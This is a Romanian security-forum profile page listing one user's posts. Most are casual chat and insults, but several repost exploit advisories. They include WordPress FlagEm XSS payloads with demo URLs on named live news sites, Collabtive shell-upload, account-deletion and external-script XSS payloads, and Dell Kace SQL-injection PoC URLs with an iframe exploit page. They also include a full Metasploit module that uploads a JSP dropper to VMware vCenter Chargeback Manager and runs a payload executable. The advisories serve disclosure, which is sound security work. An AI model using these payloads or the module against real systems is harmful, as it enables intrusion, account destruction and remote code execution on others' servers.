Jump to content

Byte-ul

Active Members
  • Posts

    2175
  • Joined

  • Last visited

  • Days Won

    30

Everything posted by Byte-ul

  1. Vreau si eu un demo pe rstforums.com daca crezi ca e bun de ceva. Deci chiar vinzi ceva gratis. Esti prost de bubui.
  2. Vedeti ca aia de la aliexpress sunt tepari. A comandat un prieten acum vreo 3-4 luni o tableta si nici pana acum nu a venit. Trimit aia numai scuze ca nu au putut sa trimita coletul si etc. Eu am cumparat o tableta de pe everbuying la vreo 120$ acum cateva luni si merge si acum.
  3. EOF = End of file poti citi EOF cu getchar sau alte functii daca pui Ctrl+Z
  4. Nu primesc mail pt activare In order to ease server load - no new free wSpy accounts will be verified. Please visit this link for details on how to purchase wSpy PRO. If you came here from purchasing a PRO account you can ignore this message, you will be able to login directly once your account gets upgraded to PRO. wSpy PRO can be purchased from here: click here
  5. habar nu am, nu joc cs 1.6.

    Eu am pus ala acolo pentru ca cel care a facut postul a vrut sa ii dea PM lumea.

  6. Publica tema pentru toata lumea si aia e.
  7. Stie cineva cum se face asa ceva? Tin sa precizez ca am cautat pe google si nu am gasit nimic folositor. Multumesc.
  8. A probability paradox? | Understanding Uncertainty
  9. Deci dosu' tau care crezi ca e http e defapt slowloris. Trimite requesturi incomplete catre server. Slowloris - Wikipedia, the free encyclopedia Nu m-as mira sa vinzi chiar pyLoris
  10. Nu ma refeream neaparat la un script in perl rulat in windows. Asa ceva merge facut chiar si in vb.net.
  11. Functioneaza pe site-urile care nu au nginx si se numeste slowloris. Se gaseste gratis pe net.
  12. Deci ce am zis a fost foarte adecvat postului. Nu inteleg de ce te dai mare si tare ma copile. Dute si ajuta-l pe fratu' cu corigenta la matematica si mai lasa metinu, csu, rstu, etc.
  13. Si eu un cuvant pentru tine. SCRIPT KID.
  14. Tare greu e sa te uiti in sursa si sa vezi ca daca bagi " iese din argument.
  15. mda, nu e mare lucru. Practic ti-ai asumat munca lui VaD_SuNeTe
  16. The WordPress FlagEm plugin suffers from a cross site scripting vulnerability. Authored by IeDb Source: WordPress FlagEm Cross Site Scripting ? Packet Storm ################################# # Iranian Exploit DataBase # http://iedb.ir ################################# # Exploit Title : WordPress FlagEm plugin Cross-Site Scripting Vulnerabilities # Author : Iranian Exploit DataBase # Discovered By : IeDb # Email : IeDb.Team@Gmail.com # Home : http://iedb.ir # Software Link : http://wordpress.org/ # Security Risk : High # Tested on : Linux # Dork : inurl:/plugins/FlagEm/ ################################# # Exploit : # [TarGeT]/wp-content/plugins/FlagEm/flagit.php?cID=[Xss] # Dem0 : # http://multimedia.timeslive.co.za/wp-content/plugins/FlagEm/flagit.php?cID=69387"><script>alert(/IeDb.Ir/)</script> # http://www.blogs.dispatch.co.za/dialogues/wp-content/plugins/FlagEm/flagit.php?cID=69387"><script>alert(/IeDb.Ir/)</script> ################################# # Exploit Archive = http://www.iedb.ir/exploits-269.html #################################
  17. Collabtive version 1.0 suffers from cross site scripting, remote shell upload, and arbitrary account deletion vulnerabilities. Authored by Enrico Cinquini Source: Collabtive 1.0 XSS / Shell Upload / Privilege Escalation ? Packet Storm ============================================= - Release date: July 22th, 2013 - Discovered by: Enrico Cinquini - Severity: High ============================================= I. VULNERABILITY ------------------------- Collabtive multiple vulnerabilities. II. INTRODUCTION ------------------------- The last version of Collabtive (1.0) is affected by multiple vulnerabilities. IV. DESCRIPTION ------------------------- 1) UPLOAD PHP FILE INSIDE AVATAR: In the following function: https://hostname/secprj/manageuser.php?action=edit it's possible to upload a php file inside avatar by modifying the Content-Type as following: Content-Type: image/jpeg The file will be uploaded inside the standard directory and encoded with a six-characters number at the end of the file, like the following example: https://hostname/secprj/files/standard/avatar/uploadedshell_104185.php It's really fast to enumerate all the possibility and to execute the file uploaded. This vulnerability was identified in older releases, but it's still present. 2) ACCOUNT DELETION It's possible to delete any account from every user, by calling the following URL: https://hostname/secprj/manageuser.php?action=del&id=5 By setting the value "del" to parameter "action", the account with setted ID will be deleted, even if will apper an error message. An "User" account with no privilege can delete all kind of account, including Administrators. 3) CROSS SITE SCRITPING - CHAT: The application is vulnerable to XSS attack in the managechat.php page. The parameter affected is 'userto': https://hostname/secprj/managechat.php?userto=<SCRIPT/XSS SRC=" http://ha.ckers.org/xss.js"></SCRIPT>&uid=2 4) CROSS SITE SCRITPING - TIMETRACKER The page managetimetracker.php is affected by Cross Site Scripting vulnerability. The POST parameters 'start' and 'end' are vulnerable, for example, to the following XSS: "><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> 5) CROSS SITE SCRITPING - Multiple vulnerabilities: The application is vulnerable to XSS attack in different pages: manageproject.php managemilestone.php managetask.php managemessage.php To exploit the vulnerability it's necessary to set a new object name (project, milestone, task, message) like the following example: "><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> the script will be executed in the same page, and in dashboard,too. 6) CROSS SITE SCRITPING - PROFILE The page manageuser.php?action=editform is affected by Cross Site Scripting vulnerability. All the profile fields are vulnerable, for example, to the following injection: <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> VI. BUSINESS IMPACT ------------------------- An attacker could upload malicious file, delete accounts and perform XSS attacks. VII. SYSTEMS AFFECTED ------------------------- Version 1.0 is vulnerable. VIII. SOLUTION ------------------------- It's necessary to: - implement a strong upload filter to prevent the upload of malicious file - implement an input validation mechanism to avoid being vulnerable to XSS injection - review and correct users profiling to prevent a user can delete other accounts IX. REFERENCES ------------------------- Collabtive website: http://collabtive.o-dyn.de X. CREDITS ------------------------- The vulnerability has been discovered by: Enrico Cinquini enrico(dot)cinquini(at)gmail(dot)com XI. VULNERABILITY HISTORY ------------------------- June 20th, 2013: Vulnerability identification June 21th, 2013: Vendor notification July 22th, 2013: Vulnerability disclosure XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information.
  18. Dell Kace 1000 SMA version 5.4.742 suffers from a remote SQL injection vulnerability. Authored by Ibrahim El-Sayed Source: Dell Kace 1000 SMA 5.4.742 SQL Injection ? Packet Storm Title: ====== Dell Kace 1000 SMA 5.4.742 - SQL Injection Vulnerabilities Date: ===== 2013-07-22 References: =========== http://www.vulnerability-lab.com/get_content.php?id=832 VL-ID: ===== 832 Common Vulnerability Scoring System: ==================================== 7.5 Introduction: ============= Dell KACE is to provide an appliance-based approach to systems management, to create time for systems administration professionals, while saving money for their companies. Dell KACE Systems Management Appliances are available as both physical and virtual appliances. The KACE Management Appliance delivers a fully integrated systems management solution, unlike traditional software approaches that can require complex and time-consuming deployment and maintenance. KACE accomplishes this via an extremely flexible, intelligent appliance-based architecture that typically deploys in days and is self maintaining. The KACE Management Appliance also provides direct access to time-saving ITNinja systems management community information using AppDeploy Live, the leading destination for end point administrators. The result: Comprehensive systems management that is easy-to-use and that can be more economical than software only alternatives. Read more in the white paper KACE K1000 Management Appliance Architecture: Harnessing the Power of an Appliance-based Architecture. The KACE Management Appliance is designed for enterprises and business units with up to 20,000 nodes. (Copy of the Vendor Homepage: http://www.kace.com/products/systems-management-appliance ) Abstract: ========= The Vulnerability Laboratory Research Team discovered a SQL Injection web vulnerabilities in Dell Kace K1000, Systems Management Appliance. Report-Timeline: ================ 2013-01-24: Researcher Notification & Coordination (Ibrahim Mosaad El-Sayed) 2013-02-06: Vendor Notification (Dell Security Team) 2013-02-08: Vendor Response/Feedback (Dell Security Team) 2013-**-**: Vendor Fix/Patch (Dell Security Team) 2013-07-22: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== DELL Product: Kace K1000 SMA 5.4.70402 Exploitation-Technique: ======================= Remote Severity: ========= Critical Details: ======== Multiple SQL Injection vulnerabilities are detected in the Dell Kace K1000, Systems Management Appliance Application. A SQL Injection vulnerability allows an attacker (remote) to execute/inject SQL commands in the affected application dbms. The sql injection vulnerabilities are located in the history_log.php, service.php, software.php, settings_network_scan.php, asset.php, asset_type.php, metering.php and mi.php files. All files are located in the adminui. A remote attacker is able to inject own sql commands when processing to request the vulnerable TYPE_ID and ID parameters. Exploitation of the sql injection vulnerabilities requires no or a low privilege application user account and no user interaction. Successful exploitation of the vulnerability results in database management system & application compromise via remote sql injection attack. Vulnerable Module(s): [+] adminui Vulnerable File(s): [+] history_log.php [+] service.php [+] software.php [+] settings_network_scan.php [+] asset.php [+] asset_type.php [+] metering.php [+] mi.php [+] replshare.php [+] kbot.php Vulnerable Parameter(s): [+] TYPE_ID [+] ID Proof of Concept: ================= The SQL injection vulnerabilities can be exploited by remote attackers without privileged application user account and without required user interaction. For demonstration or reproduce ... 1.1 PoC: https://pub37.137.0.0.1:8080/adminui/history_log.php?HISTORY_TYPE=ASSET&TYPE_NAME=Computer&TYPE_ID=7+union+Select+1,2,3,4,5,6,version%28%29,8,9,10,11,12--%20- 1.2 PoC: https://pub37.137.0.0.1:8080/adminui/service.php?ID=-1211+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20- 1.3 https://pub37.137.0.0.1:8080/adminui/software.php?ID=1291+[SQL-INJECTION!]-- Exploit: <html> <head><body><title>Dell Kace 1000 SMA v5.4.70402 - SQL Injection Exploit</title> <iframe src=https://pub37.137.0.0.1:8080/adminui/history_log.php?HISTORY_TYPE=ASSET&TYPE_NAME=Computer&TYPE_ID=7+union+Select+1,2,3,4,5, 6,version%28%29,8,9,10,11,12--%20- width="600" height"600"><br><iframe src=https://pub37.137.0.0.1:8080/adminui/service.php?ID=-1211+ union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20- width="600" height"600"><br><iframe src= https://pub37.137.0.0.1:8080/adminui/software.php?ID=1291+[SQL-INJECTION!]-- width="600" height"600"><br> </body></head> </html> --- SQL Exception Error Log --- Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/adminui/software.php on line 95: mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1291''' at line 1] in EXECUTE("select OS_ID from SOFTWARE_OS_JT where SOFTWARE_ID = '1291''") 1.4 PoC: https://pub37.137.0.0.1:8080/adminui/settings_network_scan.php?ID=2+[SQL-INJECTION!]--%20- --- SQL Exception Error Log --- Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/adminui/settings_network_scan.php on line 54: mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1] in EXECUTE("select * from SCAN_SETTINGS where ID = 2'") 1.5 PoC: https://pub37.137.0.0.1:8080/adminui/asset.php?ID=2+[SQL-INJECTION!]--%20- --- SQL Exception Error Log --- Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/include/Asset.class.php on line 61: mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 3] in EXECUTE("select *, DATE_FORMAT(CREATED,'%b %d %Y %I:%i:%s %p') as CREATED, DATE_FORMAT(MODIFIED,'%b %d %Y %I:%i:%s %p') as MODIFIED from ASSET where ID = 2'") 1.6 PoC: https://pub37.137.0.0.1:8080/adminui/asset_type.php?ID=5+[SQL-INJECTION!]--%20- --- SQL Exception Error Log --- Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/include/AssetType.class.php on line 62: mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''5''' at line 1] in EXECUTE("select * from ASSET_TYPE where ID = '5''") 1.7 PoC: https://pub37.137.0.0.1:8080/adminui/metering.php?ID=11+[SQL-INJECTION!]--%20-&MONTHS=1 --- SQL Exception Error Log --- Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/adminui/metering.php on line 65: mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 2] in EXECUTE("select LABEL_ID from FS_LABEL_JT where FS_ID =11'") 1.8 PoC: https://pub37.137.0.0.1:8080/adminui/mi.php?ID=5 --- SQL Exception Error Log --- Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/adminui/mi.php on line 350: mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'hidden')))' at line 4] in EXECUTE("select ID,NAME from MACHINE WHERE ID in ( Select MACHINE_ID from MACHINE_LABEL_JT where LABEL_ID in ( Select LABEL_ID from MI_LABEL_JT where MI_ID = '5'' and LABEL_ID in (select ID from LABEL where TYPE='hidden')))") 1.9 PoC: https://pub37.137.0.0.1:8080/adminui/replshare.php?ID=1+[SQL-INJECTION!]--%20- --- SQL Exception Error Log --- Error message: PHP Error: Uncaught ADODB_Exception in /kbox/include/ReplShare.class.php on line 20: mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 2] in EXECUTE("select * from REPLICATION_SHARE where ID=1'") 1.10 PoC: https://pub37.137.0.0.1:8080/adminui/kbot.php?ID=20+[SQL-INJECTION!]--%20- --- SQL Exception Error Log --- Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/include/KBot.class.php on line 183: mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''20''' at line 15] in EXECUTE("select k.*, DATE_FORMAT(k.CREATED,'%b %d %Y %I:%i:%s %p'), DATE_FORMAT(k.MODIFIED,'%b %d %Y %I:%i:%s %p'), unix_timestamp(k.MODIFIED) as MODIFIED_TMSTAMP, unix_timestamp(k.CREATED) as CREATED_TMSTAMP, f.ID as FORM_ID, f.FORM_URL, f.FORM_NAME, s.SCRIPT_TEXT, s.FILE_NAME, s.CHECKSUM, s.TIMEOUT, s.REMOVE_FILES, s.UPLOAD_FILE, s.UPLOAD_FILE_PATH, s.UPLOAD_FILE_NAME, k.RUN_AS_USR, k.RUN_AS_PASS_ENC, k.ALERT_ENABLED, k.ALERT_DIALOG_OPTIONS, k.ALERT_DIALOG_TIMEOUT, k.ALERT_DIALOG_TIMEOUT_ACTION, k.ALERT_SNOOZE_DURATION, k.ALERT_MESSAGE from KBOT k left join KBOT_FORM f on k.ID = f.KBOT_ID left join KBOT_SHELL_SCRIPT s on k.ID = s.KBOT_ID where k.ID = '20''") Risk: ===== The security risk of the remote sql injection web vulnerabilities are estimated as critical. Credits: ======== Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) ibrahim@evolution-sec.com] Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com
  19. This Metasploit module exploits a code execution flaw in VMware vCenter Chargeback Manager, where the ImageUploadServlet servlet allows unauthenticated file upload. The files are uploaded to the /cbmui/images/ web path, where JSP code execution is allowed. The module has been tested successfully on VMware vCenter Chargeback Manager 2.0.1 on Windows 2003 SP2. Authored by Andrea Micalizzi ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*Win32/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload', 'Description' => %q{ This module exploits a code execution flaw in VMware vCenter Chargeback Manager, where the ImageUploadServlet servlet allows unauthenticated file upload. The files are uploaded to the /cbmui/images/ web path, where JSP code execution is allowed. The module has been tested successfully on VMware vCenter Chargeback Manager 2.0.1 on Windows 2003 SP2. }, 'Author' => [ 'Andrea Micalizzi', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-3520' ], [ 'OSVDB', '94188' ], [ 'BID', '60484' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-147/' ] ], 'Privileged' => true, 'Platform' => 'win', 'Arch' => ARCH_X86, 'Targets' => [ [ 'VMware vCenter Chargeback Manager 2.0.1 / Windows 2003 SP2', { } ] ], 'DefaultOptions' => { 'SSL' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => 'May 15 2013')) register_options( [ Opt::RPORT(443) ], self.class) end # # Try to find and delete the jsp if we get a meterpreter. # def on_new_session(cli) if not @dropper or @dropper.empty? return end if cli.type != 'meterpreter' print_error("#{@peer} - Meterpreter not used. Please manually remove #{@dropper}") return end cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin print_status("#{@peer} - Searching: #{@dropper}") files = cli.fs.file.search("\\", @dropper) if not files or files.empty? print_error("#{@peer} - Unable to find #{@dropper}. Please manually remove it.") return end files.each { |f| print_warning("Deleting: #{f['path'] + "\\" + f['name']}") cli.fs.file.rm(f['path'] + "\\" + f['name']) } print_good("#{@peer} - #{@dropper} deleted") return rescue ::Exception => e print_error("#{@peer} - Unable to delete #{@dropper}: #{e.message}") end end def upload_file(filename, contents) post_data = Rex::MIME::Message.new post_data.add_part(contents, "image/png", nil, "form-data; name=\"#{rand_text_alpha(4+rand(4))}\"; filename=\"#{filename}\"") # Work around an incompatible MIME implementation data = post_data.to_s data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") res = send_request_cgi( { 'uri' => normalize_uri("cbmui", "ImageUploadServlet"), 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'cookie' => "JSESSIONID=#{@session}" }) if res and res.code == 200 return true else return false end end def check res = send_request_cgi({ 'uri' => normalize_uri("cbmui", "en_US", "themes", "excel", "index.htm"), }) if res and res.code == 200 and res.body =~ /vCenter Chargeback Manager/ return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit @peer = "#{rhost}:#{rport}" print_status("#{@peer} - Uploading JSP to execute the payload") exe = payload.encoded_exe exe_filename = rand_text_alpha(8) + ".exe" # The JSP dropper is needed because there isn't directory traversal, just # arbitrary file upload to a web path where JSP code execution is allowed. dropper = jsp_drop_and_execute(exe, exe_filename) dropper_filename = rand_text_alpha(8) + ".jsp" if upload_file(dropper_filename, dropper) register_files_for_cleanup(exe_filename) @dropper = dropper_filename else fail_with(Exploit::Failure::Unknown, "#{@peer} - JSP upload failed") end print_status("#{@peer} - Executing payload") send_request_cgi( { 'uri' => normalize_uri("cbmui", "images", dropper_filename), 'method' => 'GET' }) end # This should probably go in a mixin def jsp_drop_bin(bin_data, output_file) jspraw = %Q|<%@ page import="java.io.*" %>\n| jspraw << %Q|<%\n| jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n| jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n| jspraw << %Q|int numbytes = data.length();\n| jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n| jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n| jspraw << %Q|{\n| jspraw << %Q| char char1 = (char) data.charAt(counter);\n| jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n| jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n| jspraw << %Q| comb <<= 4;\n| jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n| jspraw << %Q| bytes[counter/2] = (byte)comb;\n| jspraw << %Q|}\n| jspraw << %Q|outputstream.write(bytes);\n| jspraw << %Q|outputstream.close();\n| jspraw << %Q|%>\n| jspraw end def jsp_execute_command(command) jspraw = %Q|<%@ page import="java.io.*" %>\n| jspraw << %Q|<%\n| jspraw << %Q|try {\n| jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n| jspraw << %Q|} catch (IOException ioe) { }\n| jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n| jspraw << %Q|%>\n| jspraw end def jsp_drop_and_execute(bin_data, output_file) jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file) end end
  20. w/e. Oricum o sa scoata jocurile din library cand vor vedea ca sunt carduite.
  21. mda, cam lame chestia cu 8:55. Nu e vina celor care au postat dupa 8:55 ca ai intarziat tu cu afisarea rezultatelor.
  22. La urmatorul giveaway pune macar sa nu aiba voie copii cu mai putin de 50 posturi si join date iunie-iulie.
×
×
  • Create New...